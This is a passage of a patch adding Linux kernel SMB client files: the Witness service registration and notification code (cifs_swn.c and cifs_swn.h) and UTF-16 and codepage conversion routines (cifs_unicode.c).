++		ret = PTR_ERR(share_name);
++		cifs_dbg(VFS, "%s: failed to extract share name from target '%s': %d\n",
++				__func__, tcon->tree_name, ret);
++		kfree(net_name);
++		return ERR_PTR(-EINVAL);
++	}
++
++	idr_for_each_entry(&cifs_swnreg_idr, swnreg, id) {
++		if (strcasecmp(swnreg->net_name, net_name) != 0
++		    || strcasecmp(swnreg->share_name, share_name) != 0) {
++			continue;
++		}
++
++		cifs_dbg(FYI, "Existing swn registration for %s:%s found\n", swnreg->net_name,
++				swnreg->share_name);
++
++		kfree(net_name);
++		kfree(share_name);
++
++		return swnreg;
++	}
++
++	kfree(net_name);
++	kfree(share_name);
++
++	return ERR_PTR(-EEXIST);
++}
++
++/*
++ * Get a registration for the tcon's server and share name, allocating a new one if it does not
++ * exists
++ */
++static struct cifs_swn_reg *cifs_get_swn_reg(struct cifs_tcon *tcon)
++{
++	struct cifs_swn_reg *reg = NULL;
++	int ret;
++
++	mutex_lock(&cifs_swnreg_idr_mutex);
++
++	/* Check if we are already registered for this network and share names */
++	reg = cifs_find_swn_reg(tcon);
++	if (!IS_ERR(reg)) {
++		kref_get(&reg->ref_count);
++		mutex_unlock(&cifs_swnreg_idr_mutex);
++		return reg;
++	} else if (PTR_ERR(reg) != -EEXIST) {
++		mutex_unlock(&cifs_swnreg_idr_mutex);
++		return reg;
++	}
++
++	reg = kmalloc(sizeof(struct cifs_swn_reg), GFP_ATOMIC);
++	if (reg == NULL) {
++		mutex_unlock(&cifs_swnreg_idr_mutex);
++		return ERR_PTR(-ENOMEM);
++	}
++
++	kref_init(&reg->ref_count);
++
++	reg->id = idr_alloc(&cifs_swnreg_idr, reg, 1, 0, GFP_ATOMIC);
++	if (reg->id < 0) {
++		cifs_dbg(FYI, "%s: failed to allocate registration id\n", __func__);
++		ret = reg->id;
++		goto fail;
++	}
++
++	reg->net_name = extract_hostname(tcon->tree_name);
++	if (IS_ERR(reg->net_name)) {
++		ret = PTR_ERR(reg->net_name);
++		cifs_dbg(VFS, "%s: failed to extract host name from target: %d\n", __func__, ret);
++		goto fail_idr;
++	}
++
++	reg->share_name = extract_sharename(tcon->tree_name);
++	if (IS_ERR(reg->share_name)) {
++		ret = PTR_ERR(reg->share_name);
++		cifs_dbg(VFS, "%s: failed to extract share name from target: %d\n", __func__, ret);
++		goto fail_net_name;
++	}
++
++	reg->net_name_notify = true;
++	reg->share_name_notify = true;
++	reg->ip_notify = (tcon->capabilities & SMB2_SHARE_CAP_SCALEOUT);
++
++	reg->tcon = tcon;
++
++	mutex_unlock(&cifs_swnreg_idr_mutex);
++
++	return reg;
++
++fail_net_name:
++	kfree(reg->net_name);
++fail_idr:
++	idr_remove(&cifs_swnreg_idr, reg->id);
++fail:
++	kfree(reg);
++	mutex_unlock(&cifs_swnreg_idr_mutex);
++	return ERR_PTR(ret);
++}
++
++static void cifs_swn_reg_release(struct kref *ref)
++{
++	struct cifs_swn_reg *swnreg = container_of(ref, struct cifs_swn_reg, ref_count);
++	int ret;
++
++	ret = cifs_swn_send_unregister_message(swnreg);
++	if (ret < 0)
++		cifs_dbg(VFS, "%s: Failed to send unregister message: %d\n", __func__, ret);
++
++	idr_remove(&cifs_swnreg_idr, swnreg->id);
++	kfree(swnreg->net_name);
++	kfree(swnreg->share_name);
++	kfree(swnreg);
++}
++
++static void cifs_put_swn_reg(struct cifs_swn_reg *swnreg)
++{
++	mutex_lock(&cifs_swnreg_idr_mutex);
++	kref_put(&swnreg->ref_count, cifs_swn_reg_release);
++	mutex_unlock(&cifs_swnreg_idr_mutex);
++}
++
++static int cifs_swn_resource_state_changed(struct cifs_swn_reg *swnreg, const char *name, int state)
++{
++	switch (state) {
++	case CIFS_SWN_RESOURCE_STATE_UNAVAILABLE:
++		cifs_dbg(FYI, "%s: resource name '%s' become unavailable\n", __func__, name);
++		cifs_signal_cifsd_for_reconnect(swnreg->tcon->ses->server, true);
++		break;
++	case CIFS_SWN_RESOURCE_STATE_AVAILABLE:
++		cifs_dbg(FYI, "%s: resource name '%s' become available\n", __func__, name);
++		cifs_signal_cifsd_for_reconnect(swnreg->tcon->ses->server, true);
++		break;
++	case CIFS_SWN_RESOURCE_STATE_UNKNOWN:
++		cifs_dbg(FYI, "%s: resource name '%s' changed to unknown state\n", __func__, name);
++		break;
++	}
++	return 0;
++}
++
++static bool cifs_sockaddr_equal(struct sockaddr_storage *addr1, struct sockaddr_storage *addr2)
++{
++	if (addr1->ss_family != addr2->ss_family)
++		return false;
++
++	if (addr1->ss_family == AF_INET) {
++		return (memcmp(&((const struct sockaddr_in *)addr1)->sin_addr,
++				&((const struct sockaddr_in *)addr2)->sin_addr,
++				sizeof(struct in_addr)) == 0);
++	}
++
++	if (addr1->ss_family == AF_INET6) {
++		return (memcmp(&((const struct sockaddr_in6 *)addr1)->sin6_addr,
++				&((const struct sockaddr_in6 *)addr2)->sin6_addr,
++				sizeof(struct in6_addr)) == 0);
++	}
++
++	return false;
++}
++
++static int cifs_swn_store_swn_addr(const struct sockaddr_storage *new,
++				   const struct sockaddr_storage *old,
++				   struct sockaddr_storage *dst)
++{
++	__be16 port = cpu_to_be16(CIFS_PORT);
++
++	if (old->ss_family == AF_INET) {
++		struct sockaddr_in *ipv4 = (struct sockaddr_in *)old;
++
++		port = ipv4->sin_port;
++	} else if (old->ss_family == AF_INET6) {
++		struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)old;
++
++		port = ipv6->sin6_port;
++	}
++
++	if (new->ss_family == AF_INET) {
++		struct sockaddr_in *ipv4 = (struct sockaddr_in *)new;
++
++		ipv4->sin_port = port;
++	} else if (new->ss_family == AF_INET6) {
++		struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)new;
++
++		ipv6->sin6_port = port;
++	}
++
++	*dst = *new;
++
++	return 0;
++}
++
++static int cifs_swn_reconnect(struct cifs_tcon *tcon, struct sockaddr_storage *addr)
++{
++	int ret = 0;
++
++	/* Store the reconnect address */
++	cifs_server_lock(tcon->ses->server);
++	if (cifs_sockaddr_equal(&tcon->ses->server->dstaddr, addr))
++		goto unlock;
++
++	ret = cifs_swn_store_swn_addr(addr, &tcon->ses->server->dstaddr,
++				      &tcon->ses->server->swn_dstaddr);
++	if (ret < 0) {
++		cifs_dbg(VFS, "%s: failed to store address: %d\n", __func__, ret);
++		goto unlock;
++	}
++	tcon->ses->server->use_swn_dstaddr = true;
++
++	/*
++	 * Unregister to stop receiving notifications for the old IP address.
++	 */
++	ret = cifs_swn_unregister(tcon);
++	if (ret < 0) {
++		cifs_dbg(VFS, "%s: Failed to unregister for witness notifications: %d\n",
++			 __func__, ret);
++		goto unlock;
++	}
++
++	/*
++	 * And register to receive notifications for the new IP address now that we have
++	 * stored the new address.
++	 */
++	ret = cifs_swn_register(tcon);
++	if (ret < 0) {
++		cifs_dbg(VFS, "%s: Failed to register for witness notifications: %d\n",
++			 __func__, ret);
++		goto unlock;
++	}
++
++	cifs_signal_cifsd_for_reconnect(tcon->ses->server, false);
++
++unlock:
++	cifs_server_unlock(tcon->ses->server);
++
++	return ret;
++}
++
++static int cifs_swn_client_move(struct cifs_swn_reg *swnreg, struct sockaddr_storage *addr)
++{
++	struct sockaddr_in *ipv4 = (struct sockaddr_in *)addr;
++	struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)addr;
++
++	if (addr->ss_family == AF_INET)
++		cifs_dbg(FYI, "%s: move to %pI4\n", __func__, &ipv4->sin_addr);
++	else if (addr->ss_family == AF_INET6)
++		cifs_dbg(FYI, "%s: move to %pI6\n", __func__, &ipv6->sin6_addr);
++
++	return cifs_swn_reconnect(swnreg->tcon, addr);
++}
++
++int cifs_swn_notify(struct sk_buff *skb, struct genl_info *info)
++{
++	struct cifs_swn_reg *swnreg;
++	char name[256];
++	int type;
++
++	if (info->attrs[CIFS_GENL_ATTR_SWN_REGISTRATION_ID]) {
++		int swnreg_id;
++
++		swnreg_id = nla_get_u32(info->attrs[CIFS_GENL_ATTR_SWN_REGISTRATION_ID]);
++		mutex_lock(&cifs_swnreg_idr_mutex);
++		swnreg = idr_find(&cifs_swnreg_idr, swnreg_id);
++		mutex_unlock(&cifs_swnreg_idr_mutex);
++		if (swnreg == NULL) {
++			cifs_dbg(FYI, "%s: registration id %d not found\n", __func__, swnreg_id);
++			return -EINVAL;
++		}
++	} else {
++		cifs_dbg(FYI, "%s: missing registration id attribute\n", __func__);
++		return -EINVAL;
++	}
++
++	if (info->attrs[CIFS_GENL_ATTR_SWN_NOTIFICATION_TYPE]) {
++		type = nla_get_u32(info->attrs[CIFS_GENL_ATTR_SWN_NOTIFICATION_TYPE]);
++	} else {
++		cifs_dbg(FYI, "%s: missing notification type attribute\n", __func__);
++		return -EINVAL;
++	}
++
++	switch (type) {
++	case CIFS_SWN_NOTIFICATION_RESOURCE_CHANGE: {
++		int state;
++
++		if (info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_NAME]) {
++			nla_strscpy(name, info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_NAME],
++					sizeof(name));
++		} else {
++			cifs_dbg(FYI, "%s: missing resource name attribute\n", __func__);
++			return -EINVAL;
++		}
++		if (info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_STATE]) {
++			state = nla_get_u32(info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_STATE]);
++		} else {
++			cifs_dbg(FYI, "%s: missing resource state attribute\n", __func__);
++			return -EINVAL;
++		}
++		return cifs_swn_resource_state_changed(swnreg, name, state);
++	}
++	case CIFS_SWN_NOTIFICATION_CLIENT_MOVE: {
++		struct sockaddr_storage addr;
++
++		if (info->attrs[CIFS_GENL_ATTR_SWN_IP]) {
++			nla_memcpy(&addr, info->attrs[CIFS_GENL_ATTR_SWN_IP], sizeof(addr));
++		} else {
++			cifs_dbg(FYI, "%s: missing IP address attribute\n", __func__);
++			return -EINVAL;
++		}
++		return cifs_swn_client_move(swnreg, &addr);
++	}
++	default:
++		cifs_dbg(FYI, "%s: unknown notification type %d\n", __func__, type);
++		break;
++	}
++
++	return 0;
++}
++
++int cifs_swn_register(struct cifs_tcon *tcon)
++{
++	struct cifs_swn_reg *swnreg;
++	int ret;
++
++	swnreg = cifs_get_swn_reg(tcon);
++	if (IS_ERR(swnreg))
++		return PTR_ERR(swnreg);
++
++	ret = cifs_swn_send_register_message(swnreg);
++	if (ret < 0) {
++		cifs_dbg(VFS, "%s: Failed to send swn register message: %d\n", __func__, ret);
++		/* Do not put the swnreg or return error, the echo task will retry */
++	}
++
++	return 0;
++}
++
++int cifs_swn_unregister(struct cifs_tcon *tcon)
++{
++	struct cifs_swn_reg *swnreg;
++
++	mutex_lock(&cifs_swnreg_idr_mutex);
++
++	swnreg = cifs_find_swn_reg(tcon);
++	if (IS_ERR(swnreg)) {
++		mutex_unlock(&cifs_swnreg_idr_mutex);
++		return PTR_ERR(swnreg);
++	}
++
++	mutex_unlock(&cifs_swnreg_idr_mutex);
++
++	cifs_put_swn_reg(swnreg);
++
++	return 0;
++}
++
++void cifs_swn_dump(struct seq_file *m)
++{
++	struct cifs_swn_reg *swnreg;
++	struct sockaddr_in *sa;
++	struct sockaddr_in6 *sa6;
++	int id;
++
++	seq_puts(m, "Witness registrations:");
++
++	mutex_lock(&cifs_swnreg_idr_mutex);
++	idr_for_each_entry(&cifs_swnreg_idr, swnreg, id) {
++		seq_printf(m, "\nId: %u Refs: %u Network name: '%s'%s Share name: '%s'%s Ip address: ",
++				id, kref_read(&swnreg->ref_count),
++				swnreg->net_name, swnreg->net_name_notify ? "(y)" : "(n)",
++				swnreg->share_name, swnreg->share_name_notify ? "(y)" : "(n)");
++		switch (swnreg->tcon->ses->server->dstaddr.ss_family) {
++		case AF_INET:
++			sa = (struct sockaddr_in *) &swnreg->tcon->ses->server->dstaddr;
++			seq_printf(m, "%pI4", &sa->sin_addr.s_addr);
++			break;
++		case AF_INET6:
++			sa6 = (struct sockaddr_in6 *) &swnreg->tcon->ses->server->dstaddr;
++			seq_printf(m, "%pI6", &sa6->sin6_addr.s6_addr);
++			if (sa6->sin6_scope_id)
++				seq_printf(m, "%%%u", sa6->sin6_scope_id);
++			break;
++		default:
++			seq_puts(m, "(unknown)");
++		}
++		seq_printf(m, "%s", swnreg->ip_notify ? "(y)" : "(n)");
++	}
++	mutex_unlock(&cifs_swnreg_idr_mutex);
++	seq_puts(m, "\n");
++}
++
++void cifs_swn_check(void)
++{
++	struct cifs_swn_reg *swnreg;
++	int id;
++	int ret;
++
++	mutex_lock(&cifs_swnreg_idr_mutex);
++	idr_for_each_entry(&cifs_swnreg_idr, swnreg, id) {
++		ret = cifs_swn_send_register_message(swnreg);
++		if (ret < 0)
++			cifs_dbg(FYI, "%s: Failed to send register message: %d\n", __func__, ret);
++	}
++	mutex_unlock(&cifs_swnreg_idr_mutex);
++}
+diff --git a/fs/smb/client/cifs_swn.h b/fs/smb/client/cifs_swn.h
+new file mode 100644
+index 0000000000000..8a9d2a5c9077e
+--- /dev/null
++++ b/fs/smb/client/cifs_swn.h
+@@ -0,0 +1,52 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Witness Service client for CIFS
++ *
++ * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
++ */
++
++#ifndef _CIFS_SWN_H
++#define _CIFS_SWN_H
++#include "cifsglob.h"
++
++struct cifs_tcon;
++struct sk_buff;
++struct genl_info;
++
++#ifdef CONFIG_CIFS_SWN_UPCALL
++extern int cifs_swn_register(struct cifs_tcon *tcon);
++
++extern int cifs_swn_unregister(struct cifs_tcon *tcon);
++
++extern int cifs_swn_notify(struct sk_buff *skb, struct genl_info *info);
++
++extern void cifs_swn_dump(struct seq_file *m);
++
++extern void cifs_swn_check(void);
++
++static inline bool cifs_swn_set_server_dstaddr(struct TCP_Server_Info *server)
++{
++	if (server->use_swn_dstaddr) {
++		server->dstaddr = server->swn_dstaddr;
++		return true;
++	}
++	return false;
++}
++
++static inline void cifs_swn_reset_server_dstaddr(struct TCP_Server_Info *server)
++{
++	server->use_swn_dstaddr = false;
++}
++
++#else
++
++static inline int cifs_swn_register(struct cifs_tcon *tcon) { return 0; }
++static inline int cifs_swn_unregister(struct cifs_tcon *tcon) { return 0; }
++static inline int cifs_swn_notify(struct sk_buff *s, struct genl_info *i) { return 0; }
++static inline void cifs_swn_dump(struct seq_file *m) {}
++static inline void cifs_swn_check(void) {}
++static inline bool cifs_swn_set_server_dstaddr(struct TCP_Server_Info *server) { return false; }
++static inline void cifs_swn_reset_server_dstaddr(struct TCP_Server_Info *server) {}
++
++#endif /* CONFIG_CIFS_SWN_UPCALL */
++#endif /* _CIFS_SWN_H */
+diff --git a/fs/smb/client/cifs_unicode.c b/fs/smb/client/cifs_unicode.c
+new file mode 100644
+index 0000000000000..e7582dd791794
+--- /dev/null
++++ b/fs/smb/client/cifs_unicode.c
+@@ -0,0 +1,632 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2000,2009
++ *   Modified by Steve French (sfrench@us.ibm.com)
++ */
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "cifs_uniupr.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifs_debug.h"
++
++int cifs_remap(struct cifs_sb_info *cifs_sb)
++{
++	int map_type;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR)
++		map_type = SFM_MAP_UNI_RSVD;
++	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR)
++		map_type = SFU_MAP_UNI_RSVD;
++	else
++		map_type = NO_MAP_UNI_RSVD;
++
++	return map_type;
++}
++
++/* Convert character using the SFU - "Services for Unix" remapping range */
++static bool
++convert_sfu_char(const __u16 src_char, char *target)
++{
++	/*
++	 * BB: Cannot handle remapping UNI_SLASH until all the calls to
++	 *     build_path_from_dentry are modified, as they use slash as
++	 *     separator.
++	 */
++	switch (src_char) {
++	case UNI_COLON:
++		*target = ':';
++		break;
++	case UNI_ASTERISK:
++		*target = '*';
++		break;
++	case UNI_QUESTION:
++		*target = '?';
++		break;
++	case UNI_PIPE:
++		*target = '|';
++		break;
++	case UNI_GRTRTHAN:
++		*target = '>';
++		break;
++	case UNI_LESSTHAN:
++		*target = '<';
++		break;
++	default:
++		return false;
++	}
++	return true;
++}
++
++/* Convert character using the SFM - "Services for Mac" remapping range */
++static bool
++convert_sfm_char(const __u16 src_char, char *target)
++{
++	if (src_char >= 0xF001 && src_char <= 0xF01F) {
++		*target = src_char - 0xF000;
++		return true;
++	}
++	switch (src_char) {
++	case SFM_COLON:
++		*target = ':';
++		break;
++	case SFM_DOUBLEQUOTE:
++		*target = '"';
++		break;
++	case SFM_ASTERISK:
++		*target = '*';
++		break;
++	case SFM_QUESTION:
++		*target = '?';
++		break;
++	case SFM_PIPE:
++		*target = '|';
++		break;
++	case SFM_GRTRTHAN:
++		*target = '>';
++		break;
++	case SFM_LESSTHAN:
++		*target = '<';
++		break;
++	case SFM_SPACE:
++		*target = ' ';
++		break;
++	case SFM_PERIOD:
++		*target = '.';
++		break;
++	default:
++		return false;
++	}
++	return true;
++}
++
++
++/*
++ * cifs_mapchar - convert a host-endian char to proper char in codepage
++ * @target - where converted character should be copied
++ * @src_char - 2 byte host-endian source character
++ * @cp - codepage to which character should be converted
++ * @map_type - How should the 7 NTFS/SMB reserved characters be mapped to UCS2?
++ *
++ * This function handles the conversion of a single character. It is the
++ * responsibility of the caller to ensure that the target buffer is large
++ * enough to hold the result of the conversion (at least NLS_MAX_CHARSET_SIZE).
++ */
++static int
++cifs_mapchar(char *target, const __u16 *from, const struct nls_table *cp,
++	     int maptype)
++{
++	int len = 1;
++	__u16 src_char;
++
++	src_char = *from;
++
++	if ((maptype == SFM_MAP_UNI_RSVD) && convert_sfm_char(src_char, target))
++		return len;
++	else if ((maptype == SFU_MAP_UNI_RSVD) &&
++		  convert_sfu_char(src_char, target))
++		return len;
++
++	/* if character not one of seven in special remap set */
++	len = cp->uni2char(src_char, target, NLS_MAX_CHARSET_SIZE);
++	if (len <= 0)
++		goto surrogate_pair;
++
++	return len;
++
++surrogate_pair:
++	/* convert SURROGATE_PAIR and IVS */
++	if (strcmp(cp->charset, "utf8"))
++		goto unknown;
++	len = utf16s_to_utf8s(from, 3, UTF16_LITTLE_ENDIAN, target, 6);
++	if (len <= 0)
++		goto unknown;
++	return len;
++
++unknown:
++	*target = '?';
++	len = 1;
++	return len;
++}
++
++/*
++ * cifs_from_utf16 - convert utf16le string to local charset
++ * @to - destination buffer
++ * @from - source buffer
++ * @tolen - destination buffer size (in bytes)
++ * @fromlen - source buffer size (in bytes)
++ * @codepage - codepage to which characters should be converted
++ * @mapchar - should characters be remapped according to the mapchars option?
++ *
++ * Convert a little-endian utf16le string (as sent by the server) to a string
++ * in the provided codepage. The tolen and fromlen parameters are to ensure
++ * that the code doesn't walk off of the end of the buffer (which is always
++ * a danger if the alignment of the source buffer is off). The destination
++ * string is always properly null terminated and fits in the destination
++ * buffer. Returns the length of the destination string in bytes (including
++ * null terminator).
++ *
++ * Note that some windows versions actually send multiword UTF-16 characters
++ * instead of straight UTF16-2. The linux nls routines however aren't able to
++ * deal with those characters properly. In the event that we get some of
++ * those characters, they won't be translated properly.
++ */
++int
++cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
++		const struct nls_table *codepage, int map_type)
++{
++	int i, charlen, safelen;
++	int outlen = 0;
++	int nullsize = nls_nullsize(codepage);
++	int fromwords = fromlen / 2;
++	char tmp[NLS_MAX_CHARSET_SIZE];
++	__u16 ftmp[3];		/* ftmp[3] = 3array x 2bytes = 6bytes UTF-16 */
++
++	/*
++	 * because the chars can be of varying widths, we need to take care
++	 * not to overflow the destination buffer when we get close to the
++	 * end of it. Until we get to this offset, we don't need to check
++	 * for overflow however.
++	 */
++	safelen = tolen - (NLS_MAX_CHARSET_SIZE + nullsize);
++
++	for (i = 0; i < fromwords; i++) {
++		ftmp[0] = get_unaligned_le16(&from[i]);
++		if (ftmp[0] == 0)
++			break;
++		if (i + 1 < fromwords)
++			ftmp[1] = get_unaligned_le16(&from[i + 1]);
++		else
++			ftmp[1] = 0;
++		if (i + 2 < fromwords)
++			ftmp[2] = get_unaligned_le16(&from[i + 2]);
++		else
++			ftmp[2] = 0;
++
++		/*
++		 * check to see if converting this character might make the
++		 * conversion bleed into the null terminator
++		 */
++		if (outlen >= safelen) {
++			charlen = cifs_mapchar(tmp, ftmp, codepage, map_type);
++			if ((outlen + charlen) > (tolen - nullsize))
++				break;
++		}
++
++		/* put converted char into 'to' buffer */
++		charlen = cifs_mapchar(&to[outlen], ftmp, codepage, map_type);
++		outlen += charlen;
++
++		/* charlen (=bytes of UTF-8 for 1 character)
++		 * 4bytes UTF-8(surrogate pair) is charlen=4
++		 *   (4bytes UTF-16 code)
++		 * 7-8bytes UTF-8(IVS) is charlen=3+4 or 4+4
++		 *   (2 UTF-8 pairs divided to 2 UTF-16 pairs) */
++		if (charlen == 4)
++			i++;
++		else if (charlen >= 5)
++			/* 5-6bytes UTF-8 */
++			i += 2;
++	}
++
++	/* properly null-terminate string */
++	for (i = 0; i < nullsize; i++)
++		to[outlen++] = 0;
++
++	return outlen;
++}
++
++/*
++ * NAME:	cifs_strtoUTF16()
++ *
++ * FUNCTION:	Convert character string to unicode string
++ *
++ */
++int
++cifs_strtoUTF16(__le16 *to, const char *from, int len,
++	      const struct nls_table *codepage)
++{
++	int charlen;
++	int i;
++	wchar_t wchar_to; /* needed to quiet sparse */
++
++	/* special case for utf8 to handle no plane0 chars */
++	if (!strcmp(codepage->charset, "utf8")) {
++		/*
++		 * convert utf8 -> utf16, we assume we have enough space
++		 * as caller should have assumed conversion does not overflow
++		 * in destination len is length in wchar_t units (16bits)
++		 */
++		i  = utf8s_to_utf16s(from, len, UTF16_LITTLE_ENDIAN,
++				       (wchar_t *) to, len);
++
++		/* if success terminate and exit */
++		if (i >= 0)
++			goto success;
++		/*
++		 * if fails fall back to UCS encoding as this
++		 * function should not return negative values
++		 * currently can fail only if source contains
++		 * invalid encoded characters
++		 */
++	}
++
++	for (i = 0; len && *from; i++, from += charlen, len -= charlen) {
++		charlen = codepage->char2uni(from, len, &wchar_to);
++		if (charlen < 1) {
++			cifs_dbg(VFS, "strtoUTF16: char2uni of 0x%x returned %d\n",
++				 *from, charlen);
++			/* A question mark */
++			wchar_to = 0x003f;
++			charlen = 1;
++		}
++		put_unaligned_le16(wchar_to, &to[i]);
++	}
++
++success:
++	put_unaligned_le16(0, &to[i]);
++	return i;
++}
++
++/*
++ * cifs_utf16_bytes - how long will a string be after conversion?
++ * @utf16 - pointer to input string
++ * @maxbytes - don't go past this many bytes of input string
++ * @codepage - destination codepage
++ *
++ * Walk a utf16le string and return the number of bytes that the string will
++ * be after being converted to the given charset, not including any null
++ * termination required. Don't walk past maxbytes in the source buffer.
++ */
++int
++cifs_utf16_bytes(const __le16 *from, int maxbytes,
++		const struct nls_table *codepage)
++{
++	int i;
++	int charlen, outlen = 0;
++	int maxwords = maxbytes / 2;
++	char tmp[NLS_MAX_CHARSET_SIZE];
++	__u16 ftmp[3];
++
++	for (i = 0; i < maxwords; i++) {
++		ftmp[0] = get_unaligned_le16(&from[i]);
++		if (ftmp[0] == 0)
++			break;
++		if (i + 1 < maxwords)
++			ftmp[1] = get_unaligned_le16(&from[i + 1]);
++		else
++			ftmp[1] = 0;
++		if (i + 2 < maxwords)
++			ftmp[2] = get_unaligned_le16(&from[i + 2]);
++		else
++			ftmp[2] = 0;
++
++		charlen = cifs_mapchar(tmp, ftmp, codepage, NO_MAP_UNI_RSVD);
++		outlen += charlen;
++	}
++
++	return outlen;
++}
++
++/*
++ * cifs_strndup_from_utf16 - copy a string from wire format to the local
++ * codepage
++ * @src - source string
++ * @maxlen - don't walk past this many bytes in the source string
++ * @is_unicode - is this a unicode string?
++ * @codepage - destination codepage
++ *
++ * Take a string given by the server, convert it to the local codepage and
++ * put it in a new buffer. Returns a pointer to the new string or NULL on
++ * error.
++ */
++char *
++cifs_strndup_from_utf16(const char *src, const int maxlen,
++			const bool is_unicode, const struct nls_table *codepage)
++{
++	int len;
++	char *dst;
++
++	if (is_unicode) {
++		len = cifs_utf16_bytes((__le16 *) src, maxlen, codepage);
++		len += nls_nullsize(codepage);
++		dst = kmalloc(len, GFP_KERNEL);
++		if (!dst)
++			return NULL;
++		cifs_from_utf16(dst, (__le16 *) src, len, maxlen, codepage,
++				NO_MAP_UNI_RSVD);
++	} else {
++		dst = kstrndup(src, maxlen, GFP_KERNEL);
++	}
++
++	return dst;
++}
++
++static __le16 convert_to_sfu_char(char src_char)
++{
++	__le16 dest_char;
++
++	switch (src_char) {
++	case ':':
++		dest_char = cpu_to_le16(UNI_COLON);
++		break;
++	case '*':
++		dest_char = cpu_to_le16(UNI_ASTERISK);
++		break;
++	case '?':
++		dest_char = cpu_to_le16(UNI_QUESTION);
++		break;
++	case '<':
++		dest_char = cpu_to_le16(UNI_LESSTHAN);
++		break;
++	case '>':
++		dest_char = cpu_to_le16(UNI_GRTRTHAN);
++		break;
++	case '|':
++		dest_char = cpu_to_le16(UNI_PIPE);
++		break;
++	default:
++		dest_char = 0;
++	}
++
++	return dest_char;
++}
++
++static __le16 convert_to_sfm_char(char src_char, bool end_of_string)
++{
++	__le16 dest_char;
++
++	if (src_char >= 0x01 && src_char <= 0x1F) {
++		dest_char = cpu_to_le16(src_char + 0xF000);
++		return dest_char;
++	}
++	switch (src_char) {
++	case ':':
++		dest_char = cpu_to_le16(SFM_COLON);
++		break;
++	case '"':
++		dest_char = cpu_to_le16(SFM_DOUBLEQUOTE);
++		break;
++	case '*':
++		dest_char = cpu_to_le16(SFM_ASTERISK);
++		break;
++	case '?':
++		dest_char = cpu_to_le16(SFM_QUESTION);
++		break;
++	case '<':
++		dest_char = cpu_to_le16(SFM_LESSTHAN);
++		break;
++	case '>':
++		dest_char = cpu_to_le16(SFM_GRTRTHAN);
++		break;
++	case '|':
++		dest_char = cpu_to_le16(SFM_PIPE);
++		break;
++	case '.':
++		if (end_of_string)
++			dest_char = cpu_to_le16(SFM_PERIOD);
++		else
++			dest_char = 0;
++		break;
++	case ' ':
++		if (end_of_string)
++			dest_char = cpu_to_le16(SFM_SPACE);
++		else
++			dest_char = 0;
++		break;
++	default:
++		dest_char = 0;
++	}
++
++	return dest_char;
++}
++
++/*
++ * Convert 16 bit Unicode pathname to wire format from string in current code
++ * page. Conversion may involve remapping up the six characters that are
++ * only legal in POSIX-like OS (if they are present in the string). Path
++ * names are little endian 16 bit Unicode on the wire
++ */
++int
++cifsConvertToUTF16(__le16 *target, const char *source, int srclen,
++		 const struct nls_table *cp, int map_chars)
++{
++	int i, charlen;
++	int j = 0;
++	char src_char;
++	__le16 dst_char;
++	wchar_t tmp;
++	wchar_t *wchar_to;	/* UTF-16 */
++	int ret;
++	unicode_t u;
++
++	if (map_chars == NO_MAP_UNI_RSVD)
++		return cifs_strtoUTF16(target, source, PATH_MAX, cp);
++
++	wchar_to = kzalloc(6, GFP_KERNEL);
++
++	for (i = 0; i < srclen; j++) {
++		src_char = source[i];
++		charlen = 1;
++
++		/* check if end of string */
++		if (src_char == 0)
++			goto ctoUTF16_out;
++
++		/* see if we must remap this char */
++		if (map_chars == SFU_MAP_UNI_RSVD)
++			dst_char = convert_to_sfu_char(src_char);
++		else if (map_chars == SFM_MAP_UNI_RSVD) {
++			bool end_of_string;
++
++			/**
++			 * Remap spaces and periods found at the end of every
++			 * component of the path. The special cases of '.' and
++			 * '..' do not need to be dealt with explicitly because
++			 * they are addressed in namei.c:link_path_walk().
++			 **/
++			if ((i == srclen - 1) || (source[i+1] == '\\'))
++				end_of_string = true;
++			else
++				end_of_string = false;
++
++			dst_char = convert_to_sfm_char(src_char, end_of_string);
++		} else
++			dst_char = 0;
++		/*
++		 * FIXME: We can not handle remapping backslash (UNI_SLASH)
++		 * until all the calls to build_path_from_dentry are modified,
++		 * as they use backslash as separator.
++		 */
++		if (dst_char == 0) {
++			charlen = cp->char2uni(source + i, srclen - i, &tmp);
++			dst_char = cpu_to_le16(tmp);
++
++			/*
++			 * if no match, use question mark, which at least in
++			 * some cases serves as wild card
++			 */
++			if (charlen > 0)
++				goto ctoUTF16;
++
++			/* convert SURROGATE_PAIR */
++			if (strcmp(cp->charset, "utf8") || !wchar_to)
++				goto unknown;
++			if (*(source + i) & 0x80) {
++				charlen = utf8_to_utf32(source + i, 6, &u);
++				if (charlen < 0)
++					goto unknown;
++			} else
++				goto unknown;
++			ret  = utf8s_to_utf16s(source + i, charlen,
++					       UTF16_LITTLE_ENDIAN,
++					       wchar_to, 6);
++			if (ret < 0)
++				goto unknown;
++
++			i += charlen;
++			dst_char = cpu_to_le16(*wchar_to);
++			if (charlen <= 3)
++				/* 1-3bytes UTF-8 to 2bytes UTF-16 */
++				put_unaligned(dst_char, &target[j]);
++			else if (charlen == 4) {
++				/* 4bytes UTF-8(surrogate pair) to 4bytes UTF-16
++				 * 7-8bytes UTF-8(IVS) divided to 2 UTF-16
++				 *   (charlen=3+4 or 4+4) */
++				put_unaligned(dst_char, &target[j]);
++				dst_char = cpu_to_le16(*(wchar_to + 1));
++				j++;
++				put_unaligned(dst_char, &target[j]);
++			} else if (charlen >= 5) {
++				/* 5-6bytes UTF-8 to 6bytes UTF-16 */
++				put_unaligned(dst_char, &target[j]);
++				dst_char = cpu_to_le16(*(wchar_to + 1));
++				j++;
++				put_unaligned(dst_char, &target[j]);
++				dst_char = cpu_to_le16(*(wchar_to + 2));
++				j++;
